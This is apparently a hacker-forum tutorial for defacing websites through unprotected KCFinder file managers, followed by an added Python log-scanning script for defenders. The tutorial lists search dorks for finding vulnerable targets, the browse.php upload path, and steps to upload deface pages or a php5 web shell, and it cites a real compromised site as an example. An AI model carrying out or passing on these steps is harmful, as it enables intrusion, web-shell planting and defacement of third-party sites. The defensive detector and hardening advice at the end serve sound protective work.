OKAY, THIS TIME THE ADMIN WANTS TO SHARE SOME DEFACE MATERIAL: A KCFINDER POC :D
WITHOUT FURTHER ADO, STRAIGHT TO THE TUTORIAL
MATERIALS
LIVE TARGET :D
DORK
inurl:/kcfinder/browse.php
lib/kcfinder/files/upload
admin/kcfinder/files/upload/
/panel/kcfinder/upload/files /
editor/kcfinder/upload
Kcfinder/upload/file
EXPLOIT
kcfinder/browse.php?type=html
and an example of a vulnerable site
next, click upload
then pick your favorite deface script
a php5 shell also works
if the site lets you upload a shell, upload a shell; if it isn't vulnerable, never mind
and how do you call it?
Site co.li/blablabla/kcfinder/upload/files/scriptkalian.html
Site co.li/blablabla/kcfinder/upload/files/shel.php5
and if your script doesn't show up in the manager, the site isn't vulnerable; if your script does show up in the manager, it is vulnerable :D
and, God willing, done: "hacked by" :D
example
https://www.dmi.edu.bd/assets/ckeditor/kcfinder/upload/files/her.shtml
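For defenders, the requests this post describes leave a recognizable trail in web access logs. The following is an added example (not part of the original post) that flags them in combined-format logs; the sample log lines, IP addresses, function names and the extensions beyond html, php5 and shtml are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# html, php5 and shtml come from the post; the other variants are assumptions.
ACTIVE_EXTS = {"html", "htm", "shtml", "php", "php5", "phtml"}

# Client, request target and status from a combined-format access log line.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')

# Constructed sample log (documentation IP ranges, hypothetical paths).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jan/2024:10:00:01 +0000] "GET /ckeditor/kcfinder/browse.php?type=html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Jan/2024:10:00:40 +0000] "GET /ckeditor/kcfinder/upload/files/x.shtml HTTP/1.1" 200 312 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Jan/2024:10:02:00 +0000] "GET /ckeditor/kcfinder/upload/files/logo.png HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
198.51.100.9 - - [10/Jan/2024:10:03:00 +0000] "GET /ckeditor/kcfinder/upload/files/a.PHP5 HTTP/1.1" 404 150 "-" "curl/8.0"
"""

def classify(line):
    """Return (client, finding, detail) for a KCFinder request worth triage."""
    m = LINE_RE.match(line)
    if not m or m.group(3) != "200":   # keep only requests answered with 200
        return None
    client, target, _ = m.groups()
    url = urlsplit(target)
    path = unquote(url.path).lower()   # normalise case and %-encoding
    if "/kcfinder/" not in path:
        return None
    rest = path.split("/kcfinder/", 1)[1]
    if rest == "browse.php":
        # The file manager itself answered; record which type was requested.
        kind = parse_qs(url.query).get("type", ["(default)"])[0]
        return client, "browser-exposed", kind
    name = rest.rsplit("/", 1)[-1]
    ext = name.rsplit(".", 1)[-1] if "." in name else ""
    if "upload" in rest and ext in ACTIVE_EXTS:
        # Browser-renderable or executable content served from the upload tree.
        return client, "active-file-served", path
    return None

def scan(log_text):
    """Classify every line and keep the findings in log order."""
    return [f for f in map(classify, log_text.splitlines()) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep="\t")
```

Any finding means the file manager or its upload tree is reachable without a login; restrict access to the kcfinder directory and stop the web server from executing or rendering files stored under the upload directory.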